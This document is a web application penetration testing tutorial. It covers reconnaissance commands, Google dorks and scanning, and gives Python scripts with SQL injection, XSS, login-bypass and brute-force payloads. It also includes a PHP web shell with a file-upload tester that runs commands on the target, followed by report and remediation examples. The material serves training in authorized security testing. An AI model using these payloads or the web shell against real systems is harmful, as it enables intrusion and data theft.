Complete Penetration Testing Guide for Web Applications

⚠️ Ethical Hacking Notice

This tutorial is for educational purposes only. Only perform penetration testing on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical.

Introduction to Web App Pen Testing

Web application penetration testing is a systematic approach to evaluating the security of web applications by simulating real-world attacks. This comprehensive guide will take you through the entire process, from initial reconnaissance to final reporting.

What is Penetration Testing?

Penetration testing (pen testing) is an authorized simulated cyberattack on a computer system, performed to evaluate the security of the system. The test is performed to identify weaknesses (also referred to as vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data.

📋 Prerequisites

• Basic understanding of web technologies (HTML, HTTP, JavaScript)
• Familiarity with networking concepts
• Basic Linux command line skills
• Understanding of common security vulnerabilities

Testing Methodology

A structured approach is crucial for effective penetration testing. We'll follow a phased methodology informed by the OWASP Web Security Testing Guide, organized into the following phases:

Information Gathering & Reconnaissance
Scanning & Enumeration
Vulnerability Assessment
Exploitation
Post-Exploitation
Reporting

Reconnaissance Phase

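The reconnaissance phase involves gathering as much information as possible about the target application. Passive reconnaissance relies on third-party sources such as search engines and public DNS data, so it never touches the target directly. Several of the commands below (for example whatweb, curl, and nmap) do contact the target and therefore count as active reconnaissance, which must stay within the authorized scope.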

Domain and Subdomain Discovery

Start by discovering all domains and subdomains associated with your target:

# Using subfinder for subdomain enumeration
subfinder -d target.com -o subdomains.txt

# Using amass for comprehensive subdomain discovery
amass enum -d target.com -o amass_subdomains.txt

# Using dnsrecon for DNS enumeration
dnsrecon -d target.com -t std

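# Using dig for manual DNS queries
# (many servers return minimal answers to ANY queries, per RFC 8482, so query record types individually)
dig target.com A
dig target.com NS
dig @8.8.8.8 target.com MX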
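
Discovery tools often return hosts that fall outside the agreed scope, so it can help to filter their output before any active testing begins. The following is a minimal sketch, assuming a hypothetical scope list made of exact hostnames and `*.`-prefixed wildcards. The function names and the scope format are illustrative and are not part of any tool listed above.

```python
def in_scope(host, scope):
    """Return True if host matches an exact entry or a '*.domain' wildcard in scope."""
    host = host.strip().lower().rstrip(".")
    for entry in scope:
        entry = entry.strip().lower()
        if entry.startswith("*."):
            # "*.app.target.com" covers subdomains only, not "app.target.com" itself
            if host.endswith(entry[1:]):
                return True
        elif host == entry:
            return True
    return False


def filter_hosts(hosts, scope):
    """Keep in-scope hosts, de-duplicated, in first-seen order."""
    seen = set()
    kept = []
    for host in hosts:
        normalized = host.strip().lower().rstrip(".")
        if normalized and normalized not in seen and in_scope(normalized, scope):
            seen.add(normalized)
            kept.append(normalized)
    return kept


if __name__ == "__main__":
    # Hypothetical scope and tool output, for illustration only
    scope = ["target.com", "*.app.target.com"]
    discovered = ["api.app.target.com", "target.com", "mail.other.com", "API.app.target.com"]
    print(filter_hosts(discovered, scope))
```

In practice the `discovered` list could be read from a file such as subdomains.txt, one host per line.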

Technology Stack Identification

Identify the technologies used by the web application:

# Using whatweb to identify technologies
whatweb https://target.com

# Using wappalyzer (browser extension or CLI)
wappalyzer https://target.com

# Using curl to analyze HTTP headers
curl -I https://target.com

# Using nmap for service detection
nmap -sV -p 80,443 target.com
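
The headers returned by `curl -I` can be reviewed by hand, but a small helper makes the review repeatable. The sketch below is one possible approach, not a standard tool: `summarize_headers` and both header lists are assumptions chosen for illustration, and the lists are deliberately short rather than exhaustive.

```python
# Headers that commonly disclose the technology stack (illustrative, not exhaustive)
DISCLOSURE_HEADERS = ["server", "x-powered-by", "x-aspnet-version", "x-generator"]

# Security headers whose absence is usually worth noting in a report
SECURITY_HEADERS = [
    "content-security-policy",
    "strict-transport-security",
    "x-content-type-options",
    "x-frame-options",
]


def summarize_headers(headers):
    """Summarize technology hints and missing security headers from a header mapping."""
    # HTTP header names are case-insensitive, so compare in lowercase
    lowered = {name.lower(): value for name, value in headers.items()}
    return {
        "technology_hints": {h: lowered[h] for h in DISCLOSURE_HEADERS if h in lowered},
        "missing_security_headers": [h for h in SECURITY_HEADERS if h not in lowered],
    }


if __name__ == "__main__":
    # Hypothetical response headers, for illustration only
    sample = {
        "Server": "nginx/1.18.0",
        "X-Powered-By": "PHP/7.4.3",
        "X-Frame-Options": "DENY",
    }
    print(summarize_headers(sample))
```

The function takes a plain mapping, so it works with headers parsed from curl output or with the `headers` attribute of a `requests` response.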

Google Dorking

Use Google search operators to find sensitive information:

# Find login pages
site:target.com intitle:"login" OR intitle:"sign in"

# Find admin panels
site:target.com intitle:"admin" OR intitle:"administrator"

# Find configuration files
site:target.com filetype:xml OR filetype:conf OR filetype:cnf

# Find database files
site:target.com filetype:sql OR filetype:db

# Find directory listings
site:target.com intitle:"index of"

# Find error messages that might reveal information
site:target.com "sql syntax near" OR "syntax error has occurred"

# Find backup files
site:target.com filetype:bak OR filetype:backup OR filetype:old

Scanning & Enumeration

In this phase, we actively probe the target application to discover services, directories, files, and potential entry points.

Port Scanning

# Comprehensive port scan with nmap (-A already enables -sV, -sC, -O, and traceroute; -sS requires root)
sudo nmap -sS -A -p- target.com

# Specific service scans (quote the pattern so the shell does not expand it)
nmap -p 80,443 --script "http-*" target.com

# UDP scan for services
nmap -sU --top-ports 1000 target.com

# Scan for common web ports
nmap -p 80,443,8080,8443,8000,8888 target.com
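
Scan results are easier to carry into later phases when they are saved in a structured format. The sketch below assumes the scan was saved with nmap's `-oX` option and extracts the open ports from that XML. The `open_ports` helper and the trimmed `SAMPLE` document are hand-written for illustration; real output contains many more elements and attributes.

```python
import xml.etree.ElementTree as ET


def open_ports(xml_text):
    """Return (address, port, protocol, service, product) tuples for open ports."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.findall("host"):
        address = host.find("address")
        addr = address.get("addr") if address is not None else "unknown"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # Skip closed and filtered ports
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            product = service.get("product", "") if service is not None else ""
            results.append((addr, int(port.get("portid")), port.get("protocol"), name, product))
    return results


# Trimmed, hand-written sample in the shape of nmap XML output (illustrative only)
SAMPLE = """<nmaprun>
  <host>
    <address addr="203.0.113.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="nginx"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="open"/>
        <service name="https"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed"/>
      </port>
    </ports>
  </host>
</nmaprun>"""

if __name__ == "__main__":
    for entry in open_ports(SAMPLE):
        print(entry)
```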

Directory and File Discovery

# Using dirb for directory bruteforce
dirb https://target.com /usr/share/dirb/wordlists/common.txt

# Using gobuster for faster directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js

# Using ffuf for fuzzing
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u https://target.com/FUZZ

# Using feroxbuster (modern alternative)
feroxbuster -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,js

Web Application Crawling

#!/usr/bin/env python3
import requests
from urllib.parse import urljoin, urlparse
from bs4 import BeautifulSoup
import re

class WebCrawler:
    def __init__(self, start_url, max_depth=2):
        self.start_url = start_url
        self.max_depth = max_depth
        self.visited_urls = set()
        self.found_urls = set()
        self.forms = []
        self.session = requests.Session()
        
    def crawl(self, url, depth=0):
        if depth > self.max_depth or url in self.visited_urls:
            return
            
        try:
            print(f"[*] Crawling: {url} (depth: {depth})")
            response = self.session.get(url, timeout=10)
            self.visited_urls.add(url)
            
            if response.status_code == 200:
                self.analyze_page(response, url)
                
                # Find and crawl links
                soup = BeautifulSoup(response.text, 'html.parser')
                links = soup.find_all('a', href=True)
                
                for link in links:
                    new_url = urljoin(url, link['href'])
                    if self.is_same_domain(new_url):
                        self.found_urls.add(new_url)
                        self.crawl(new_url, depth + 1)
                        
        except Exception as e:
            print(f"[-] Error crawling {url}: {e}")
    
    def analyze_page(self, response, url):
        """Analyze page for interesting content"""
        soup = BeautifulSoup(response.text, 'html.parser')
        
        # Find forms
        forms = soup.find_all('form')
        for form in forms:
            form_data = {
                'url': url,
                'action': form.get('action', ''),
                'method': form.get('method', 'GET'),
                'inputs': []
            }
            
            inputs = form.find_all(['input', 'textarea', 'select'])
            for inp in inputs:
                form_data['inputs'].append({
                    'name': inp.get('name', ''),
                    'type': inp.get('type', 'text'),
                    'value': inp.get('value', '')
                })
            
            self.forms.append(form_data)
        
        # Look for HTML comments with sensitive information.
        # BeautifulSoup strips the "<!--" delimiters from comment nodes, so match the raw HTML instead.
        comments = re.findall(r'<!--(.*?)-->', response.text, re.DOTALL)
        for comment in comments:
            if any(keyword in comment.lower() for keyword in ['password', 'admin', 'debug', 'todo']):
                print(f"[!] Interesting comment found in {url}: {comment.strip()}")
        
        # Look for JavaScript files
        scripts = soup.find_all('script', src=True)
        for script in scripts:
            script_url = urljoin(url, script['src'])
            print(f"[*] JavaScript file found: {script_url}")
    
    def is_same_domain(self, url):
        """Check if URL belongs to the same domain"""
        return urlparse(url).netloc == urlparse(self.start_url).netloc
    
    def generate_report(self):
        """Generate crawling report"""
        print("\n=== CRAWLING REPORT ===")
        print(f"URLs found: {len(self.found_urls)}")
        print(f"Forms found: {len(self.forms)}")
        
        print("\n--- Forms ---")
        for i, form in enumerate(self.forms):
            print(f"Form {i+1}: {form['url']} - {form['method']} {form['action']}")
            for inp in form['inputs']:
                print(f"  Input: {inp['name']} ({inp['type']})")

# Usage
crawler = WebCrawler("https://target.com", max_depth=2)
crawler.crawl(crawler.start_url)
crawler.generate_report()
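
The crawler above treats https://target.com/page and https://target.com/page#section as different URLs, which can lead to repeated requests for the same page. One possible refinement, sketched here with a hypothetical `normalize_url` helper, strips the fragment and lowercases the scheme and host before a URL is added to the visited set.

```python
from urllib.parse import urldefrag, urlsplit, urlunsplit


def normalize_url(url):
    """Return a canonical form of url for de-duplication while crawling."""
    # Fragments are handled by the browser and never change the server response
    url, _fragment = urldefrag(url)
    parts = urlsplit(url)
    # Treat an empty path as the root path
    path = parts.path or "/"
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ["HTTPS://Target.com/page#top", "https://target.com", "https://target.com/a?x=1#frag"]:
        print(normalize_url(candidate))
```

Calling this helper on `new_url` before the `visited_urls` check would be one way to integrate it. Query strings are preserved because they can change the response.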

Vulnerability Assessment

Once we have mapped the application, we can begin testing for specific vulnerabilities. We'll focus on the OWASP Top 10 vulnerabilities.

Automated Vulnerability Scanning

# Using Nikto for web server scanning
nikto -h https://target.com -output nikto_results.txt

# Using OWASP ZAP for comprehensive scanning
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' https://target.com

# Using Nuclei for template-based scanning
nuclei -u https://target.com -t /path/to/nuclei-templates/

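# Using SQLmap for SQL injection testing
# (--risk=3 adds OR-based payloads that can modify data when injected into UPDATE or DELETE statements;
#  keep the default risk level unless the rules of engagement explicitly allow it)
sqlmap -u "https://target.com/page.php?id=1" --batch --risk=3 --level=5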

Exploitation Phase

In this phase, we attempt to exploit the vulnerabilities we've identified. Let's cover some common exploitation techniques.

SQL Injection Testing

SQL injection is one of the most critical web application vulnerabilities. Here's how to test for and exploit SQL injection vulnerabilities:

Manual SQL Injection Testing

#!/usr/bin/env python3
import requests
import time
from urllib.parse import quote

class SQLInjectionTester:
    def __init__(self, target_url, parameter):
        self.target_url = target_url
        self.parameter = parameter
        self.session = requests.Session()
        
    def test_error_based(self):
        """Test for error-based SQL injection"""
        print("[*] Testing for error-based SQL injection...")
        
        error_payloads = [
            "'", "''", "'\"", "' OR '1'='1", "' OR 1=1--", 
            "' UNION SELECT NULL--", "' AND 1=0 UNION SELECT NULL, NULL--"
        ]
        
        for payload in error_payloads:
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # Check for common database error messages
                error_signatures = [
                    "SQL syntax", "mysql_fetch", "Warning: mysql",
                    "MySQLSyntaxErrorException", "valid MySQL result",
                    "PostgreSQL query failed", "Warning: pg_",
                    "valid PostgreSQL result", "Npgsql.",
                    "Driver][SQL Server]", "SQLServer JDBC Driver",
                    "SqlException", "OLE DB", "Microsoft Access Driver"
                ]
                
                for signature in error_signatures:
                    if signature.lower() in response.text.lower():
                        print(f"[!] Potential SQL injection found with payload: {payload}")
                        print(f"[!] Error signature detected: {signature}")
                        return True
                        
            except Exception as e:
                print(f"[-] Error testing payload {payload}: {e}")
        
        return False
    
    def test_time_based(self):
        """Test for time-based blind SQL injection"""
        print("[*] Testing for time-based SQL injection...")
        
        time_payloads = [
            "' OR SLEEP(5)--",
            "'; WAITFOR DELAY '00:00:05'--",
            "' OR pg_sleep(5)--",
            "' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND '1'='1"
        ]
        
        # Baseline request time (skip the test if the baseline request fails)
        baseline_time = self.measure_response_time(f"{self.target_url}?{self.parameter}=1")
        if baseline_time is None:
            print("[-] Baseline request failed; skipping time-based test")
            return False
        
        for payload in time_payloads:
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            response_time = self.measure_response_time(test_url)
            if response_time is None:
                continue  # Request failed or timed out: inconclusive, not a measured delay
            
            if response_time - baseline_time >= 4:  # 4+ second delay suggests injection
                print(f"[!] Possible time-based SQL injection with payload: {payload}")
                print(f"[!] Response time: {response_time:.2f}s (baseline: {baseline_time:.2f}s)")
                return True
        
        return False
    
    def measure_response_time(self, url):
        """Return the response time in seconds, or None if the request fails"""
        try:
            start_time = time.monotonic()
            self.session.get(url, timeout=15)
            return time.monotonic() - start_time
        except requests.RequestException:
            return None
    
    def test_union_based(self):
        """Test for UNION-based SQL injection"""
        print("[*] Testing for UNION-based SQL injection...")
        
        # First, determine the number of columns
        for i in range(1, 10):
            payload = f"' UNION SELECT {','.join(['NULL'] * i)}--"
            test_url = f"{self.target_url}?{self.parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # If no error, we found the right number of columns
                if "error" not in response.text.lower() and len(response.text) > 100:
                    print(f"[!] Found {i} columns in the result set")
                    
                    # Try to extract database information, using exactly i columns
                    functions = ['database()', 'user()', 'version()'][:i]
                    columns = ['NULL'] * (i - len(functions)) + functions
                    info_payload = f"' UNION SELECT {','.join(columns)}--"
                    info_url = f"{self.target_url}?{self.parameter}={quote(info_payload)}"
                    
                    self.session.get(info_url, timeout=10)
                    print("[*] Database info extraction attempt completed")
                    
                    return True
                    
            except Exception as e:
                continue
        
        return False

# Example usage
tester = SQLInjectionTester("https://target.com/search.php", "q")
tester.test_error_based()
tester.test_time_based()
tester.test_union_based()
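
A single timing measurement is noisy: network jitter or a slow page can look like an injected delay. The sketch below shows one way to make the decision more robust by comparing medians of repeated measurements. The `delay_detected` function, its parameters, and the tolerance value are assumptions for illustration, not part of the tester class above.

```python
from statistics import median


def delay_detected(baseline_samples, test_samples, injected_delay=5.0, tolerance=1.0):
    """Return True if the median test time exceeds the median baseline by roughly injected_delay.

    Both sample lists hold response times in seconds. The median is used because
    it is less sensitive to a single slow outlier than the mean.
    """
    if not baseline_samples or not test_samples:
        return False  # Not enough data to decide
    observed = median(test_samples) - median(baseline_samples)
    return observed >= injected_delay - tolerance


if __name__ == "__main__":
    # Hypothetical measurements, for illustration only
    print(delay_detected([0.2, 0.3, 0.25], [5.3, 5.2, 5.4]))
    print(delay_detected([0.2, 0.3, 0.25], [0.3, 6.0, 0.2]))
```

Repeating each request a few times increases test duration, so the sample count should be balanced against the load placed on the target.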

Cross-Site Scripting (XSS) Testing

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Testing Script

#!/usr/bin/env python3
import requests
from urllib.parse import quote
from bs4 import BeautifulSoup

class XSSTester:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        
    def test_reflected_xss(self, parameter):
        """Test for reflected XSS"""
        print(f"[*] Testing reflected XSS on parameter: {parameter}")
        
        xss_payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "<svg onload=alert('XSS')>",
            "javascript:alert('XSS')",
            "<iframe src=javascript:alert('XSS')>",
            "<body onload=alert('XSS')>",
            "\"><script>alert('XSS')</script>",
            "'><script>alert('XSS')</script>",
            "</script><script>alert('XSS')</script>",
            "<ScRiPt>alert('XSS')</ScRiPt>",
            "<<SCRIPT>alert('XSS');//<</SCRIPT>"
        ]
        
        for payload in xss_payloads:
            test_url = f"{self.target_url}?{parameter}={quote(payload)}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # Check if payload is reflected in the response
                if payload.lower() in response.text.lower():
                    print(f"[!] Potential reflected XSS found with payload: {payload}")
                    
                    # Additional check: was the payload parsed as a <script> element?
                    # (Static parsing cannot prove execution; confirm the finding in a browser.)
                    soup = BeautifulSoup(response.text, 'html.parser')
                    scripts = soup.find_all('script')
                    
                    for script in scripts:
                        if script.string and "alert('XSS')" in script.string:
                            print("[!] Likely exploitable: payload parsed as a script element")
                            return True
                            
            except Exception as e:
                print(f"[-] Error testing XSS payload: {e}")
        
        return False
    
    def test_stored_xss(self, form_data):
        """Test for stored XSS by submitting forms"""
        print("[*] Testing for stored XSS...")
        
        xss_payload = "<script>alert('Stored XSS')</script>"
        
        # Submit the payload
        try:
            response = self.session.post(self.target_url, data={**form_data, 'comment': xss_payload})
            print("[*] Payload submitted, checking if stored...")
            
            # Check if the payload is stored and executed
            check_response = self.session.get(self.target_url)
            if xss_payload.lower() in check_response.text.lower():
                print("[!] Stored XSS vulnerability confirmed!")
                return True
                
        except Exception as e:
            print(f"[-] Error testing stored XSS: {e}")
        
        return False
    
    def test_dom_xss(self):
        """Test for DOM-based XSS"""
        print("[*] Testing for DOM-based XSS...")
        
        dom_payloads = [
            "#<script>alert('DOM XSS')</script>",
            "#<img src=x onerror=alert('DOM XSS')>",
            "?name=<script>alert('DOM XSS')</script>"
        ]
        
        for payload in dom_payloads:
            test_url = f"{self.target_url}{payload}"
            
            try:
                response = self.session.get(test_url, timeout=10)
                
                # URL fragments are never sent to the server, so this is only a static check
                # for scripts that read attacker-controlled sources; confirm any hit in a browser
                if "location.hash" in response.text or "document.URL" in response.text:
                    print(f"[!] Potential DOM XSS source found (test payload: {payload})")
                    return True
                    
            except Exception as e:
                continue
        
        return False

# Example usage
xss_tester = XSSTester("https://target.com/search.php")
xss_tester.test_reflected_xss("q")
xss_tester.test_dom_xss()
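
When a reflected or stored XSS finding is reported, it helps to show what the fix looks like. The sketch below illustrates output encoding with Python's standard `html.escape`; the `render_search_heading` function is a hypothetical stand-in for whatever code builds the vulnerable page. This encoding suits HTML body and quoted attribute contexts only; JavaScript and URL contexts need their own encoders.

```python
import html


def render_search_heading(query):
    """Build a heading that safely reflects user input in an HTML body context."""
    # html.escape converts &, <, >, and both quote characters into entities
    return f"<h1>Results for {html.escape(query)}</h1>"


if __name__ == "__main__":
    print(render_search_heading("<script>alert('XSS')</script>"))
```

With encoding in place, the payload is displayed as text instead of being parsed as markup.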

Authentication Bypass Testing

Testing authentication mechanisms is crucial for identifying ways attackers might bypass login systems.

#!/usr/bin/env python3
import requests
from time import sleep

class AuthBypassTester:
    def __init__(self, login_url):
        self.login_url = login_url
        self.session = requests.Session()
        
    def test_sql_injection_bypass(self):
        """Test SQL injection authentication bypass"""
        print("[*] Testing SQL injection authentication bypass...")
        
        sqli_payloads = [
            ("admin'--", "anything"),
            ("admin'/*", "anything"),
            ("' OR '1'='1'--", "anything"),
            ("' OR 1=1#", "anything"),
            ("admin'; --", "anything"),
            ("' UNION SELECT 1,1,1--", "anything")
        ]
        
        for username, password in sqli_payloads:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                # Check for successful login indicators
                if any(indicator in response.text.lower() for indicator in 
                      ['dashboard', 'welcome', 'logout', 'profile']):
                    print(f"[!] SQL injection bypass successful: {username}")
                    return True
                    
            except Exception as e:
                print(f"[-] Error testing SQL injection: {e}")
        
        return False
    
    def test_default_credentials(self):
        """Test common default credentials"""
        print("[*] Testing default credentials...")
        
        default_creds = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('admin', '123456'),
            ('administrator', 'administrator'),
            ('root', 'root'),
            ('admin', ''),
            ('guest', 'guest'),
            ('test', 'test'),
            ('user', 'user'),
            ('demo', 'demo')
        ]
        
        for username, password in default_creds:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                if response.status_code == 200 and 'invalid' not in response.text.lower():
                    print(f"[!] Default credentials found: {username}:{password}")
                    return True
                    
                sleep(1)  # Rate limiting
                
            except Exception as e:
                continue
        
        return False
    
    def test_username_enumeration(self, usernames):
        """Test for username enumeration"""
        print("[*] Testing username enumeration...")
        
        valid_usernames = []
        
        # Baseline: response for a username that should not exist (requested once, not per candidate)
        try:
            baseline = self.session.post(self.login_url,
                data={'username': 'nonexistentuser123', 'password': 'wrongpassword123'})
        except requests.RequestException as e:
            print(f"[-] Baseline request failed: {e}")
            return valid_usernames
        
        for username in usernames:
            data = {
                'username': username,
                'password': 'wrongpassword123'
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                # Look for different error messages
                if 'password' in response.text.lower() and 'username' not in response.text.lower():
                    print(f"[!] Valid username found: {username}")
                    valid_usernames.append(username)
                elif len(response.text) != len(baseline.text):
                    print(f"[!] Possible valid username (different response length): {username}")
                    valid_usernames.append(username)
                
                sleep(0.5)
                
            except Exception as e:
                continue
        
        return valid_usernames
    
    def test_brute_force(self, username, password_list):
        """Test brute force attack (use responsibly and with rate limiting)"""
        print(f"[*] Testing brute force for user: {username}")
        
        for password in password_list:
            data = {
                'username': username,
                'password': password
            }
            
            try:
                response = self.session.post(self.login_url, data=data)
                
                if any(indicator in response.text.lower() for indicator in 
                      ['dashboard', 'welcome', 'logout', 'profile']):
                    print(f"[!] Password found for {username}: {password}")
                    return password
                
                sleep(2)  # Important: rate limiting to avoid account lockouts and service disruption
                
            except Exception as e:
                continue
        
        return None

# Example usage
auth_tester = AuthBypassTester("https://target.com/login")
auth_tester.test_sql_injection_bypass()
auth_tester.test_default_credentials()

usernames = ['admin', 'administrator', 'user', 'test', 'guest']
valid_users = auth_tester.test_username_enumeration(usernames)

# Only use brute force on your own systems or with explicit permission
# passwords = ['password', '123456', 'admin', 'letmein']
# auth_tester.test_brute_force('admin', passwords)

Post-Exploitation

After successfully exploiting a vulnerability, the post-exploitation phase involves maintaining access, escalating privileges, and gathering additional information.

File Upload Exploitation

#!/usr/bin/env python3
import requests

def create_web_shell():
    """Create a simple PHP web shell"""
    web_shell_content = '''<?php
    if(isset($_GET['cmd'])) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
    } else {
        echo "Web shell active. Use ?cmd=command";
    }
    ?>'''
    
    return web_shell_content

def test_file_upload(upload_url, file_param='file'):
    """Test file upload functionality for web shell upload"""
    
    # Create web shell
    shell_content = create_web_shell()
    
    # Try different file extensions
    extensions = ['.php', '.php3', '.php4', '.php5', '.phtml', '.asp', '.aspx', '.jsp']
    
    for ext in extensions:
        filename = f"shell{ext}"
        
        files = {
            file_param: (filename, shell_content, 'application/octet-stream')
        }
        
        try:
            response = requests.post(upload_url, files=files)
            
            if response.status_code == 200 and 'error' not in response.text.lower():
                print(f"[!] Potential successful upload: {filename}")
                
                # Try to access the uploaded file
                possible_paths = [
                    f"/uploads/{filename}",
                    f"/files/{filename}",
                    f"/upload/{filename}",
                    f"/{filename}"
                ]
                
                base_url = upload_url.rsplit('/', 1)[0]
                
                for path in possible_paths:
                    test_url = f"{base_url}{path}?cmd=whoami"
                    test_response = requests.get(test_url)
                    
                    if test_response.status_code == 200 and len(test_response.text) > 10:
                        print(f"[!] Web shell accessible at: {test_url}")
                        return test_url
                        
        except Exception as e:
            print(f"[-] Error uploading {filename}: {e}")
    
    return None

# Example usage
shell_url = test_file_upload("https://target.com/upload.php")
if shell_url:
    print(f"[+] Web shell deployed successfully: {shell_url}")

Documentation & Reporting

Proper documentation and reporting are crucial components of penetration testing. A good report should be clear, actionable, and provide both technical details and business impact.

Report Structure

Executive Summary - High-level overview for management
Technical Summary - Detailed findings for technical teams
Methodology - Testing approach and scope
Findings - Detailed vulnerability descriptions
Risk Assessment - Impact and likelihood ratings
Recommendations - Specific remediation steps
Appendices - Technical details and evidence
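
Risk ratings in the Risk Assessment section are often expressed as CVSS scores. The sketch below computes a CVSS v3.1 base score from a vector string, using the metric weights and rounding rule from the published specification. It covers base metrics only (no temporal or environmental metrics), performs no input validation, and the function names are chosen for illustration.

```python
import math

WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# The Privileges Required weight depends on whether scope is changed
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place, following the CVSS v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a vector such as 'AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'."""
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    iss = 1 - (1 - WEIGHTS["C"][m["C"]]) * (1 - WEIGHTS["I"][m["I"]]) * (1 - WEIGHTS["A"][m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = 8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]] * pr * WEIGHTS["UI"][m["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


def severity(score):
    """Map a base score to the qualitative rating scale."""
    if score == 0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


if __name__ == "__main__":
    vector = "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    score = base_score(vector)
    print(f"{vector} -> {score} ({severity(score)})")
```

Recording the full vector next to the score lets readers of the report see how the rating was derived and adjust it for their own environment.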

Sample Vulnerability Report Entry

SQL Injection Vulnerability

Severity: Critical

CVSS Score: 9.8 (Critical)

Affected URL: https://target.com/search.php?q=

Parameter: q (GET)

Description

The search functionality is vulnerable to SQL injection attacks. An attacker can manipulate the 'q' parameter to execute arbitrary SQL commands, potentially leading to complete database compromise.

Proof of Concept

GET /search.php?q=' UNION SELECT database(),user(),version()-- HTTP/1.1
Host: target.com

Impact

• Complete database compromise
• Unauthorized access to sensitive data
• Potential for data modification or deletion
• Possible server compromise via file system access

Remediation

• Use parameterized queries/prepared statements
• Implement proper input validation and sanitization
• Apply the principle of least privilege to database accounts
• Enable SQL query logging and monitoring
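
To make the first remediation item concrete, the following sketch shows a parameterized query using Python's built-in `sqlite3` module. The `products` table, the `search_products` function, and the in-memory database are hypothetical stand-ins for the application's real search code. Placeholder syntax differs between database drivers, so treat the `?` marker as specific to this example.

```python
import sqlite3


def demo_connection():
    """Create an in-memory database with a small products table (illustrative only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("laptop",), ("phone",)])
    return conn


def search_products(conn, term):
    """Search by name using a bound parameter instead of string concatenation."""
    # The driver passes the value separately from the SQL text, so quotes in
    # term are treated as data and cannot change the structure of the query
    cursor = conn.execute("SELECT name FROM products WHERE name LIKE ?", (f"%{term}%",))
    return [row[0] for row in cursor.fetchall()]


if __name__ == "__main__":
    conn = demo_connection()
    print(search_products(conn, "lap"))
    print(search_products(conn, "' UNION SELECT sqlite_version()--"))
```

The second call passes an injection string, which is simply searched for as literal text and matches nothing.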

Essential Tools

Here are the essential tools every web application penetration tester should know:

Reconnaissance Tools

Nmap - Network discovery and port scanning
Subfinder - Subdomain enumeration
Amass - Comprehensive subdomain discovery
Whatweb - Technology identification
Shodan - Internet-connected device search engine

Vulnerability Scanners

OWASP ZAP - Web application security scanner
Burp Suite - Comprehensive web security testing platform
Nikto - Web server scanner
Nuclei - Template-based vulnerability scanner

Exploitation Tools

SQLmap - Automated SQL injection exploitation
XSSHunter - XSS payload testing platform
Commix - Command injection exploitation
Metasploit - Penetration testing framework

Directory/File Discovery

Gobuster - Fast directory/file brute-forcer
Dirb - Web content scanner
Feroxbuster - Fast content discovery tool
FFUF - Fast web fuzzer

Conclusion & Best Practices

Web application penetration testing is a systematic process that requires patience, methodology, and continuous learning. Remember these key principles:

Testing Best Practices

Always get proper authorization before testing any system
Follow a methodology to ensure comprehensive coverage
Document everything - findings, steps, and evidence
Test thoroughly but avoid causing damage or disruption
Stay updated on latest vulnerabilities and techniques

Ethical Considerations

Only test systems you own or have explicit permission to test
Respect scope limitations and rules of engagement
Report vulnerabilities responsibly
Protect sensitive data discovered during testing
Follow responsible disclosure practices

Continuous Learning

Cybersecurity is constantly evolving. Stay current by:

Following security research and CVE databases
Practicing on legal platforms such as Hack The Box and TryHackMe
Attending security conferences and training
Participating in bug bounty programs (ethically)
Contributing to the security community

🎯 Key Takeaways

• Systematic methodology is crucial for comprehensive testing
